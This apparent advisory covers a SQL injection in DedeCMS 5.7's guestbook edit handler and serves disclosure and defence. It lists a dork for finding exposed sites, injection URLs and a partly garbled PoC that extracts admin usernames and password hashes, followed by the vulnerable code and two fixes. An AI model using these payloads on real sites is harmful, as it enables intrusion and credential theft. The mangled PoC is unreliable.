Catalog
1. Vulnerability Description
2. Vulnerability Trigger Condition
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
5. Defense Methods
6. Defensive Thinking
1. Vulnerability Description
The following conditions are required for the injection to succeed:
1. PHP is running with magic_quotes_gpc=off
2. The vulnerable file exists: plus/guestbook.php
3. The table dede_guestbook exists in the database
Relevant Link:
inurl:/plus/guestbook.php
2. Vulnerability Trigger Condition
1. Open http://localhost/dedecms5.7/plus/guestbook.php
2. The ID of a visitor's message can be found in the [Reply/edit] link. Note the ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=1
3. Access: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=1
4. After submission, a DedeCMS 5.7 installation shows "successfully change or reply to a message", meaning the update was accepted.
5. Go back to http://localhost/dedecms5.7/plus/guestbook.php and check whether the content of that message has become errs.cc'. If it has, the quote was escaped and the vulnerability cannot be exploited; it requires magic_quotes_gpc=off.
6. If the modification did not take effect and the content of that message ID is still the previous text, the quote broke the SQL statement, which proves the vulnerability can be exploited.
7. Then visit again: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=',msg=user(),email='
8. Go back again: the content of that message ID has been replaced directly with the MySQL user().
Relevant Link:
http://www.51php.com/dedecms/16942.html
http://www.wooyun.org/bugs/wooyun-2012-014501
3. Vulnerability Impact Range
0x1: PoC
/plus/guestbook.php?action=admin&job=editok&id=146&msg=', [email Protected] ", msg= (SelecT CONCAT (userid,0x7c, pwd) from '%0,1) , email='
Relevant Link:
http://www.programgo.com/article/45492569994/
http://www.cnblogs.com/Hkadmin/p/3712667.html
4. Vulnerability Code Analysis
/plus/guestbook.php
    // Modify message
    if ($action == 'admin') {
        include_once(dirname(__FILE__) . '/guestbook/edit.inc.php');
        exit();
    }
\plus\guestbook\edit.inc.php
    // Instead of checking $g_isadmin, the code wrongly trusts the user-supplied action="admin"
    else if ($job == 'editok') {
        $remsg = trim($remsg);
        // $msg is not filtered at all, so it is concatenated straight into the UPDATE and can be injected into freely
        $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='" . time() . "' WHERE id='$id'");
        ShowMsg("successfully change or reply to a message!", $GUEST_BOOK_POS);
        exit();
    }
Relevant Link:
http://pannisec.diandian.com/?tag=sql%e6%b3%a8%e5%b0%84
5. Defense Methods
\plus\guestbook\edit.inc.php
    else if ($job == 'editok') {
        $remsg = trim($remsg);
        /* Verify $g_isadmin */
        if ($remsg != '') {
            // Admin replies are not HTML-filtered
            if ($g_isadmin) {
                $msg = "<div class=\"rebox\">" . $msg . "</div>\n" . $remsg;
                // $remsg <br><font color=red>Admin reply:</font>
            } else {
                $row = $dsql->GetOne("SELECT msg FROM `#@__guestbook` WHERE id='$id'");
                $oldmsg = "<div class=\"rebox\">" . addslashes($row['msg']) . "</div>\n";
                $remsg = TrimMsg(cn_substrR($remsg, 1024), 1);
                $msg = $oldmsg . $remsg;
            }
        }
        /* */
        /* Effective filtering of $msg */
        $msg = addslashes($msg);
        /* */
        $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='" . time() . "' WHERE id='$id'");
        ShowMsg("successfully change or reply to a message!", $GUEST_BOOK_POS);
        exit();
    }
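The fix above escapes $msg with addslashes() while $id is still interpolated into the statement, and the "Verify $g_isadmin" comment has no check behind it. The following is an added example, not DedeCMS code and not the $dsql API: it rewrites the editok branch from sections 4 and 5 with a PDO prepared statement so that both values travel as bound parameters, and it takes the admin decision from a session-derived flag rather than from action=admin in the URL. The table name dede_guestbook (the page's #@__guestbook with the default prefix), the PDO handle, the $isAdmin argument and the in-memory SQLite demo data are all assumptions made for this example.

```php
<?php
// Added example (not DedeCMS code): parameterized rewrite of the guestbook
// "editok" update. Assumptions: a PDO handle, a table dede_guestbook with
// columns id, msg, email, posttime, and an $isAdmin flag the caller derives
// from the session, never from the request.

function update_guestbook_message(PDO $pdo, $id, string $msg, string $remsg, bool $isAdmin): bool
{
    // Authorization comes from the session, not from action=admin in the URL.
    if (!$isAdmin) {
        return false;
    }
    // id is numeric in the schema; refuse anything else before it reaches SQL.
    if (!preg_match('/^\d+$/', (string) $id)) {
        return false;
    }
    $remsg = trim($remsg);
    if ($remsg !== '') {
        // Keep the page's behaviour of appending the reply below the original text.
        $msg = "<div class=\"rebox\">" . $msg . "</div>\n" . $remsg;
    }
    // Placeholders carry $msg and $id as data, so quote characters in either
    // cannot change the statement. No addslashes(), no reliance on magic_quotes_gpc.
    $stmt = $pdo->prepare(
        'UPDATE dede_guestbook SET msg = :msg, posttime = :posttime WHERE id = :id'
    );
    $stmt->bindValue(':msg', $msg, PDO::PARAM_STR);
    $stmt->bindValue(':posttime', time(), PDO::PARAM_INT);
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;
}

// Self-contained demo on an in-memory SQLite database (constructed sample data).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE dede_guestbook (id INTEGER PRIMARY KEY, msg TEXT, email TEXT, posttime INTEGER)');
$pdo->exec("INSERT INTO dede_guestbook (id, msg, email, posttime) VALUES (1, 'hello', 'a@example.com', 0)");

// The page's step-7 payload. In the string-built query it rewrote the msg
// column to the output of user(); here it is stored verbatim as text and the
// email column is left untouched.
$payload = "',msg=user(),email='";
$ok = update_guestbook_message($pdo, '1', $payload, '', true);
$row = $pdo->query('SELECT msg, email FROM dede_guestbook WHERE id = 1')->fetch(PDO::FETCH_ASSOC);
var_dump($ok, $row['msg'] === $payload, $row['email'] === 'a@example.com');

// A caller without an admin session is refused before any SQL runs.
var_dump(update_guestbook_message($pdo, '1', 'x', '', false));
// An id containing a quote character (the page's step-3 probe) is rejected as well.
var_dump(update_guestbook_message($pdo, "1'", 'x', '', true));
```

Running the script stores the step-7 payload as a literal string, leaves the email column unchanged, and returns false for both the non-admin call and the quoted id, without any escaping function in the data path. The same shape applies to the SELECT in the non-admin branch of the page's fix, where $id is also interpolated.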
6. Defensive Thinking
Copyright (c) Littlehann All rights reserved
Dedecms \plus\guestbook.php SQL injection Vul by \plus\guestbook\edit.inc.php